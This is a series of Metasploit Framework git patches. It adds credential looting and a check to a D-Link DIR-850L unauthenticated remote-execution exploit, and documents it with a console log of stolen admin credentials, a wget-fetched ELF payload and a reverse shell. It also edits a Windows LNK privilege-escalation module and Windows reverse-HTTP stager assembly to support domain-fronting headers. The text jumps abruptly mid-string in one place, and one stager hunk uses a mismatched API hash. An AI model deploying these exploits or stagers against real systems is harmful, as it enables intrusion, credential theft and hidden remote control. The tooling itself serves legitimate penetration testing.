-143,7 +143,7 @@ GEM googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.0) + i18n (0.9.1) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 88b837dc2f..ab016eefbe 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.15" + VERSION = "4.16.16" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From cddec8ca6c53a2c995cce9f4693f79a2d2edd03a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 14:24:45 -0400 Subject: [PATCH 098/254] download creds, stores in loot. --- .../linux/http/dlink_850l_unauth_exec.rb | 31 ++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 168fa8567d..f2b7489fd1 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::EXE + include Msf::Auxiliary::Report include Msf::Exploit::FileDropper def initialize(info = {}) @@ -54,6 +55,32 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + def retrieve_creds begin xml = "\r\n" @@ -79,6 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") + loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) + print_good("#{peer} - Downloaded credentials to #{loot}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -104,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase - res = send_request_cgi({ + send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", From 84599ed3fc4a0153de5aff808aef4c163abb6776 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 07:58:13 -0400 Subject: [PATCH 099/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index f2b7489fd1..cd6cc8f7ad 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -54,6 +54,28 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) ]) end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['Server'] + auth = res.headers['Server'] + if auth =~ /DIR-850L/ + if auth =~ /WEBACCESS\/1\.0/ + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Detected + end + end + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Unknown + end def report_cred(opts) service_data = { @@ -196,7 +218,13 @@ class MetasploitModule < Msf::Exploit::Remote def exploit + + print_status("#{peer} - Connecting to target...") + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") + end + # # Information Retrieval, obtains creds and logs in # From e783cb59ead15781f79364bfad7f8380fc8fa4cf Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 08:53:50 -0400 Subject: [PATCH 100/254] add "check" & msftidy --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd6cc8f7ad..cd8fe1b141 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -51,10 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), - OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to listener', 10]) ]) end - + def check begin res = send_request_cgi({ @@ -218,13 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end - # # Information Retrieval, obtains creds and logs in # @@ -336,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote # Waits for shell to connect back to us, otherwise server stops and nothing is returned # def wait_for_connect - print_status("#{peer} - Waiting for shell to connect back to us...") + print_status("#{peer} - Waiting #{datastore['CONNECTBACK_DELAY'].to_s} seconds for shell to connect back to us...") waited = 0 while (@elf_sent) select(nil, nil, nil, 1) From 646c7f7c0a528e98f1e8cd122c45d5aa7e54eddd Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:40:32 -0400 Subject: [PATCH 101/254] update doc --- .../linux/http/dlink_dir850l_unauth_exec.md | 79 ++++++++----------- 1 file changed, 34 insertions(+), 45 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md index fac596348e..a1158fa395 100644 --- a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -8,7 +8,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing 1. Start msfconsole 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` 3. Do : `set RHOST [RouterIP]` - 4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp` + 4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp` 5. Do : `run` 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session @@ -17,59 +17,48 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing ``` msf > use exploit/linux/http/dlink_dir850l_unauth_exec -msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 +msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14 RHOST => 192.168.0.14 -msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 +msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80 RPORT => 80 -msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3 +msf exploit(dlink_dir850l_unauth_exec) > check +[*] 192.168.0.14:80 The target service is running, but could not be validated. +msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true +VERBOSE => true +msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3 LHOST => ens3 -msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 -LPORT => 1351 -msf exploit(dlink_850l_unauthenticated_exec) > run -[*] Exploit running as background job 0. +msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131 +LPORT => 3131 +msf exploit(dlink_dir850l_unauth_exec) > run -[*] Started reverse TCP handler on 192.168.0.11:1351 -msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO -[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO -[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] Started reverse TCP handler on 192.168.0.11:3131 +[*] 192.168.0.14:80 - Connecting to target... +[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535 +[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt +[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm +[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm +[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm [*] 192.168.0.14:80 - Waiting for target to request the ELF payload... [*] 192.168.0.14:80 - Sending payload to the server... -[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Waiting for shell to connect back to us... +[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm +[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us... [*] Sending stage (84 bytes) to 192.168.0.14 -[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400 -[+] Deleted /tmp/dhufstzw -sessions -i 1 -[*] Starting interaction with 1... - -3353690789 -yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC -true -MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA -mMzxldJdkNYWlIrHrOazzOcpCRTuRipt -OayNFBMDfTSaJIFwpNPoWErXCvLmIguK +[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400 +[+] Deleted /tmp/uoskutcy [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? [*] Server stopped. +[*] Exploit completed, but no session was created. +msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1 +[*] Starting interaction with 1... + +190745749 +wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj +true +pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP +OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH +iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY pwd / -ls -www -var -usr -tmp -sys -sbin -proc -mydlink -mnt -lib -include -htdocs -home -etc -dev -bin - ``` From 724c5fb963ad1c8100c7faafd5d4fa97e3be373e Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:41:07 -0400 Subject: [PATCH 102/254] finish --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd8fe1b141..3cc3e212ce 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -32,6 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', + 'Stance' => Msf::Exploit::Stance::Aggressive, 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, From 1758ed93d47545fe5e87e7c9b451001fef4a6bc6 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:42:49 -0400 Subject: [PATCH 103/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 3cc3e212ce..89488d54fc 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -20,9 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands on DIR-850L routers - as an authenticated user. Unable to use Meterpreter payloads, or - any other payload besides linux/mipsbe/shell/reverse_tcp & occasionally - linux/mipsbe/shell_reverse_tcp. + as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai ' # module From 7d1de9bc48ebe470c3dd0074feca9a688a817ae9 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 4 Nov 2017 18:50:20 -0400 Subject: [PATCH 104/254] Fix removing the dropped files after exploitation --- modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 312d43b18b..6ca5c09d94 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -134,9 +134,15 @@ class MetasploitModule < Msf::Exploit::Local register_files_for_cleanup(dll_path, lnk_path) end + def file_rm(file) + if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) + @dropped_files.delete(file) + end + end + def generate_link(path) vprint_status("Generating LNK file to load: #{path}") - path << "\x00" + path += "\x00" # Do not use << here display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name comment = datastore['LnkComment'].dup << "\x00" From 77c13286e0554775bce25fc14b4f897067fb0d85 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Sun, 5 Nov 2017 13:41:29 -0600 Subject: [PATCH 105/254] Ensure closing script tag has necessary escape. --- modules/auxiliary/dos/http/ibm_lotus_notes2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index 67df421cfd..996fc0733e 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -52,7 +52,7 @@ setInterval(function(){ delete kins[k]; } } - w = open('data:text/html,} + end + end + + + def primer + generate_rtf + end +end From a78d8f83fc71ca5fe97aec3d32efea329e63cb44 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 18 Aug 2017 16:35:27 +1000 Subject: [PATCH 169/254] Add HTTP header support for Host/Cookie/Referer This is to start the support for things like domain fronting. --- lib/msf/core/handler/reverse_http.rb | 2 - lib/msf/core/payload/transport_config.rb | 28 +++-- lib/msf/core/payload/windows/reverse_http.rb | 108 +++++++++++++----- .../core/payload/windows/reverse_winhttp.rb | 46 ++++++-- .../core/payload/windows/x64/reverse_http.rb | 74 ++++++++++-- .../payload/windows/x64/reverse_winhttp.rb | 63 +++++++--- lib/rex/payloads/meterpreter/config.rb | 16 ++- 7 files changed, 248 insertions(+), 89 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index d9a1d7ff4d..5b0db244b5 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -347,8 +347,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c59c85577e..1f5daf9b42 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -56,16 +56,17 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, - uri: uri, - ua: ds['MeterpreterUserAgent'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - proxy_type: ds['PayloadProxyType'], - proxy_user: ds['PayloadProxyUser'], - proxy_pass: ds['PayloadProxyPass'] + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, + uri: uri, + ua: ds['MeterpreterUserAgent'], + proxy_host: ds['PayloadProxyHost'], + proxy_port: ds['PayloadProxyPort'], + proxy_type: ds['PayloadProxyType'], + proxy_user: ds['PayloadProxyUser'], + proxy_pass: ds['PayloadProxyPass'], + custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end @@ -80,6 +81,13 @@ module Msf::Payload::TransportConfig private + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHost']}\r\n" if ds['HttpHost'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + end + def timeout_config(opts={}) ds = opts[:datastore] || datastore { diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 1c9b79b562..5ee674b3ac 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -36,7 +36,10 @@ module Payload::Windows::ReverseHttp OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) + OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) ], self.class) end @@ -47,22 +50,23 @@ module Payload::Windows::ReverseHttp ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space - conf[:url] = luri + generate_uri(opts) - conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + if self.available_space.nil? || required_space <= self.available_space + conf[:url] = luri + generate_uri(opts) + conf[:exitfunk] = ds['EXITFUNC'] + conf[:ua] = ds['MeterpreterUserAgent'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -71,6 +75,22 @@ module Payload::Windows::ReverseHttp generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] + headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] + headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -138,10 +158,23 @@ module Payload::Windows::ReverseHttp # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -155,6 +188,7 @@ module Payload::Windows::ReverseHttp # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -181,6 +215,8 @@ module Payload::Windows::ReverseHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -222,10 +258,10 @@ module Payload::Windows::ReverseHttp push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments - ^ + ^ if proxy_enabled asm << %Q^ @@ -238,7 +274,7 @@ module Payload::Windows::ReverseHttp ; LPCTSTR lpszProxyName (via call) push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ else @@ -249,7 +285,7 @@ module Payload::Windows::ReverseHttp push ebx ; LPCTSTR lpszProxyName (NULL) push ebx ; DWORD dwAccessType (PRECONFIG = 0) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ end @@ -267,10 +303,10 @@ module Payload::Windows::ReverseHttp db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi - ^ + ^ # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it # doesn't set the Proxy-Authorization header on the CONNECT request. @@ -286,7 +322,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -302,7 +338,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')} call ebp ^ end @@ -317,7 +353,7 @@ module Payload::Windows::ReverseHttp push edi ; server URI push ebx ; method push esi ; hConnection - push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -334,7 +370,6 @@ module Payload::Windows::ReverseHttp send_request: ^ - if opts[:ssl] asm << %Q^ ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -345,7 +380,7 @@ module Payload::Windows::ReverseHttp push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -354,17 +389,32 @@ module Payload::Windows::ReverseHttp httpsendrequest: push ebx ; lpOptional length (0) push ebx ; lpOptional (NULL) - push ebx ; dwHeadersLength (0) - push ebx ; lpszHeaders (NULL) + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ + push ebx ; HeadersLength (0) + push ebx ; Headers (NULL) + ^ + end + + asm << %Q^ push esi ; hHttpRequest - push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push 0xE035F044 ; hash( "kernel32.dll", "Sleep" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ @@ -404,7 +454,7 @@ module Payload::Windows::ReverseHttp push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -418,7 +468,7 @@ module Payload::Windows::ReverseHttp push 8192 ; read length push ebx ; buffer push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c6f1eb838b..f30dbefa15 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -29,24 +29,26 @@ module Payload::Windows::ReverseWinHttp # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -93,6 +95,9 @@ module Payload::Windows::ReverseWinHttp # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 * 2 + # The final estimated size space end @@ -167,6 +172,8 @@ module Payload::Windows::ReverseWinHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -434,8 +441,23 @@ module Payload::Windows::ReverseWinHttp push ebx ; TotalLength [6] push ebx ; OptionalLength (0) [5] push ebx ; Optional (NULL) [4] + 